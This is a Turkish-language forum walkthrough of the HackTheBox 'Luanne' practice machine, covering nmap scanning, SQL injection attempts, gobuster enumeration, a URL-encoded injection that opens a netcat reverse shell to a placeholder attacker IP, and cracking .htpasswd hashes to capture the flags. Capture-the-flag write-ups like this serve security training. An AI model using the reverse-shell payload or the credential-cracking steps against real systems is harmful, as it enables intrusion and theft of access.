Hackthebox - Luanne Walkthrough

cybersoz

Yeni üye
1 Ağu 2019
19
1
Makine Adı: Luanne
Zorluk: Kolay
OS: Linux
Link:https://www.hackthebox.eu/home/machines/profile/302

NOT:hackthebox üzerinden verilen ipleri /etc/hosts dizinine kaydedildiği varsayılarak yazılmıştır.

-NMAP TARAMASI-

Kod:
sudo nmap -vv -A luanne.htb


kodu ile taramamızı başaltıyoruzhttps://www.hackthebox.eu/home/machines/profile/302


nmap çıktısı aşağıdaki fotoğraftaki gibidir.


4pC06S.png



her zamanki gibi sadeceshh ve http portlarının açık olduğunu görüyoruz.

http portunda ne olduğu görebilmek için tarayıcımıza "luanne.htb" yazarak sayfayı açmayı deniyoruz


LWQOGp.png



karşımıza bir login formu geliyor.
böyle bir durumda yapabileceğimiz bir kaç şey bulunmakta


1. SQL injection denemek
2.Bruteforce ile şifreyi kırmayı denemek
3. Başka yöntemler denemek




1. SQL injection denemek

kullanıcı adı ve şifre bölümlerine


" or ""="


105 OR 1=1


gibi sqlinjection'ı tetikleyen metinleri girerek giriş yapmayı deniyoruz Bu metinleri internet üzerinden "SQL Injection codes" yazarak ulaşabilirsiniz (En altta örnek link bırakacağım)

xNdOHU.png



her denediğimiz şifre için "401 Unauthorized" hatasını alıyoruz. Kısaca sitenin sql injection açığı olmadığını anlıyoruz.





2. Brute Force ile şifreyi kırmak


bu şekilde bir işlem günlerce belki aylarca zaman alacağı için direk bu işlemi atlıyorum.


3. Başka Yöntemler Denemek


hemen hemen her sitede bulunan robots.txt dosyasına bakıyoruz


yQDJxw.png



robots.txt dosyasına göre /weather diye bir dizin var fakat 404 erişim hatası veriyor. Biz yine de bu dizine giriyoruz. fakat sonuç aynı :uzgun1



5s6JTT.png



altdizinleri öğrenmek için kullanılan araçlardan biri de gobusterdır. Gobuster içerisinde wordlistleri yüklü olarak gelen altdizinlerin keşfi için kullanılan bruteforce(deneme yanılma yoluyla altdizinleri keşfettiği için bu şekilde dedim) aracıdır. Altdizin taraması aşağıda veridiğim kod ile taramayı başlatıyoruz


Kod:
gobuster dir -u http://luanne.htb/weather -w /usr/share/wordlists/dirb/big.txt -x .php, .txt -e


rM4Lm0.png



/weather dizininin altında /forecast isimli bir dizin/dosya daha bulduk.


http://luanne.htb/weather/forecast şeklinde giriş yapıyoruz.


karşımıza bir veritabanı (json) yönetim sayfası cıkıyor


rACLm0.png



bu sayfa url'i üzerinden backdoor çalıştırıyoruz.


Kod:
[COLOR=white]%27%29%3Bos.execute%28%22rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%20YOURIP%20YOURPORT%20%3E%2Ftmp%2Ff%22%29--[/COLOR]
(url encoded hali)
yukardaki backdoor kodunu




http://luanne.htb/weather/forecast?city=London'ın ynaına yağıştırıyoruz son link bu şekilde olacak



Kod:
http://luanne.htb/weather/forecast?city=London[COLOR=white][COLOR=white][COLOR=white][COLOR=yellowgreen][COLOR=white]%27%29%3Bos.execute%28%22rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%20YOURIP%20YOURPORT%20%3E%2Ftmp%2Ff%22%29--[/COLOR][/COLOR][/COLOR][/COLOR][/COLOR]


bu sırada terminalimizden
Kod:
nc -lvnp 1234
kodu ile bilgisayarımızı dinlemeye alıyoruz.
rKBv7T.png



buradaki .htpasswd dizinin okuyarak kullanıcı adını ve şifreyi elde ediyoruz fakat şifre encrpyt edildiği için decrpyt etmemiz gerekiyor


MpVvIC.png



ve şifreyi bu şekilde buluyoruz.
içerde biraz gezindikten sonra bir .htpasswd dizinini görüyoruz ve bunun da şifresini kırıyoruz.


VgqYzb.png



DihmMp.png



arından erişip sağlayıp root ve user flaglerini hackthebox'a gönderiyoruz.


SQL Injection link = https://www.w3schools.com/sql/sql_injection.asp






 

The Serum

Katılımcı Üye
13 Ocak 2018
365
154
/etc/shadow
Güzel bir çalışma olmuş. Fakat bazı görseller ve kodlar bende görünmüyor benden kaynaklı yüksek ihtimal eline sağlık tekrardan
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.